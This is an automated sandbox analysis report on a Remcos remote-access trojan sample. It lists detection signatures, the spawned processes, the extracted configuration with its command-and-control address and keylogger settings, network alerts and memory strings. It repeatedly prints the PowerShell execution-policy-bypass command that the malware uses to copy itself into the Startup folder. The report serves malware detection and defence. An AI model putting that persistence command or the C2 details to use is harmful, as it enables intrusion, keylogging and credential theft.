Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FAT6789098700900.scr.exe

Overview

General Information

Sample name:FAT6789098700900.scr.exe
Analysis ID:1567061
MD5:b7b504ea022610fe69940fd54fd2bc27
SHA1:8cb39de97c36eb8328436ffe21be24742925e652
SHA256:4c5bea1fa5f8547de2a03c6117e10a023d76edc17df923c5f8031bfa74e12e87
Tags:exeRemcosRATuser-threatcat_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Copy file to startup via Powershell
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionalty to change the wallpaper
Creates executable files without a name
Delayed program exit found
Drops PE files to the startup folder
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • FAT6789098700900.scr.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\FAT6789098700900.scr.exe" MD5: B7B504EA022610FE69940FD54FD2BC27)
    • powershell.exe (PID: 7520 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • FAT6789098700900.scr.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\FAT6789098700900.scr.exe" MD5: B7B504EA022610FE69940FD54FD2BC27)
      • WerFault.exe (PID: 7820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 512 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7708 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • .exe (PID: 8104 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" MD5: B7B504EA022610FE69940FD54FD2BC27)
    • powershell.exe (PID: 8136 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • .exe (PID: 7292 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" MD5: B7B504EA022610FE69940FD54FD2BC27)
      • .exe (PID: 4888 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\yvbpfnx" MD5: B7B504EA022610FE69940FD54FD2BC27)
      • .exe (PID: 6644 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc" MD5: B7B504EA022610FE69940FD54FD2BC27)
      • .exe (PID: 3004 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc" MD5: B7B504EA022610FE69940FD54FD2BC27)
      • .exe (PID: 2132 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc" MD5: B7B504EA022610FE69940FD54FD2BC27)
      • .exe (PID: 2180 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\lrtshyspzluife" MD5: B7B504EA022610FE69940FD54FD2BC27)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["192.210.150.26:8787:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R1T905", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.4123803181.0000000000466000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000B.00000002.4126585054.000000000307F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000000.00000002.4129439610.0000000003BC8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000002.4129439610.0000000003BC8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000008.00000002.4129081152.0000000003A7A000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x538:$a1: Remcos restarted by watchdog!
            • 0xab0:$a3: %02i:%02i:%02i:%03i
            Click to see the 29 entries
            SourceRuleDescriptionAuthorStrings
            8.2..exe.3a0fa40.3.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x69ef8:$a1: Remcos restarted by watchdog!
            • 0x6a470:$a3: %02i:%02i:%02i:%03i
            0.2.FAT6789098700900.scr.exe.3af7610.4.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              0.2.FAT6789098700900.scr.exe.3af7610.4.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                0.2.FAT6789098700900.scr.exe.3af7610.4.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  0.2.FAT6789098700900.scr.exe.3af7610.4.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x69ef8:$a1: Remcos restarted by watchdog!
                  • 0x6a470:$a3: %02i:%02i:%02i:%03i
                  Click to see the 13 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: frack113: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FAT6789098700900.scr.exe", ParentImage: C:\Users\user\Desktop\FAT6789098700900.scr.exe, ParentProcessId: 7492, ParentProcessName: FAT6789098700900.scr.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', ProcessId: 7520, ProcessName: powershell.exe
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7520, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7520, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FAT6789098700900.scr.exe", ParentImage: C:\Users\user\Desktop\FAT6789098700900.scr.exe, ParentProcessId: 7492, ParentProcessName: FAT6789098700900.scr.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', ProcessId: 7520, ProcessName: powershell.exe
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7708, ProcessName: svchost.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FAT6789098700900.scr.exe", ParentImage: C:\Users\user\Desktop\FAT6789098700900.scr.exe, ParentProcessId: 7492, ParentProcessName: FAT6789098700900.scr.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', ProcessId: 7520, ProcessName: powershell.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe, ProcessId: 7292, TargetFilename: C:\ProgramData\remcos\logs.dat
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T01:55:10.182206+010020327761Malware Command and Control Activity Detected192.168.2.449742192.210.150.268787TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T01:55:11.286964+010020327771Malware Command and Control Activity Detected192.210.150.268787192.168.2.449742TCP
                  2024-12-03T01:57:14.887836+010020327771Malware Command and Control Activity Detected192.210.150.268787192.168.2.449742TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T01:55:13.185424+010028033043Unknown Traffic192.168.2.449745178.237.33.5080TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.26:8787:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R1T905", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeReversingLabs: Detection: 52%
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeVirustotal: Detection: 62%Perma Link
                  Source: FAT6789098700900.scr.exeReversingLabs: Detection: 52%
                  Source: FAT6789098700900.scr.exeVirustotal: Detection: 33%Perma Link
                  Source: Yara matchFile source: 0.2.FAT6789098700900.scr.exe.3af7610.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.FAT6789098700900.scr.exe.900000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FAT6789098700900.scr.exe.3b6fa40.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.4123803181.0000000000466000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4126585054.000000000307F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.0000000003BC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4125168442.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4125168442.000000000151A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FAT6789098700900.scr.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: FAT6789098700900.scr.exe PID: 7652, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: .exe PID: 7292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJoe Sandbox ML: detected
                  Source: FAT6789098700900.scr.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_0043293A
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4129439610.0000000003BDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_b1a0a93b-9

                  Exploits

                  barindex
                  Source: Yara matchFile source: 0.2.FAT6789098700900.scr.exe.3af7610.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.FAT6789098700900.scr.exe.900000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FAT6789098700900.scr.exe.3b6fa40.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.4129439610.0000000003BC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FAT6789098700900.scr.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: FAT6789098700900.scr.exe PID: 7652, type: MEMORYSTR
                  Source: FAT6789098700900.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: FAT6789098700900.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: FAT6789098700900.scr.exe, 00000000.00000002.4127461321.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, FAT6789098700900.scr.exe, 00000000.00000002.4127461321.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, .exe, 00000008.00000002.4127237060.0000000002751000.00000004.00000800.00020000.00000000.sdmp, .exe, 00000008.00000002.4127237060.000000000278F000.00000004.00000800.00020000.00000000.sdmp, .exe, 00000008.00000002.4138278336.0000000004DA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: hDa(]XfUC.pDbQcwewjYj5 source: FAT6789098700900.scr.exe, .exe.1.dr
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_100010F1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00406AC2 FindFirstFileW,FindNextFileW,11_2_00406AC2
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00407A8C FindFirstFileW,FindNextFileW,FindClose,11_2_00407A8C
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040B335
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00418C69 FindFirstFileW,11_2_00418C69
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,11_2_0041B42F
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040B53A
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00408DA7 FindFirstFileW,FindNextFileW,FindClose,11_2_00408DA7
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeCode function: 4x nop then jmp 026B7067h0_2_026B3E10
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 4x nop then jmp 00DB7067h8_2_00DB3E10

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49742 -> 192.210.150.26:8787
                  Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 192.210.150.26:8787 -> 192.168.2.4:49742
                  Source: Malware configuration extractorIPs: 192.210.150.26
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49745 -> 178.237.33.50:80
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0040455B WaitForSingleObject,SetEvent,recv,11_2_0040455B
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: .exe, 00000011.00000002.1851779290.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: .exe, .exe, 00000011.00000002.1851779290.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: .exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhvA1B.tmp.13.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                  Source: bhvA1B.tmp.13.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                  Source: .exe, 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: .exe, 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: FAT6789098700900.scr.exe, .exe.1.drString found in binary or memory: http://aka.ms/dataprotectionwarning
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                  Source: powershell.exe, 00000009.00000002.1807837911.000000000317F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                  Source: svchost.exe, 00000005.00000002.3341558038.000002A2EF09D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
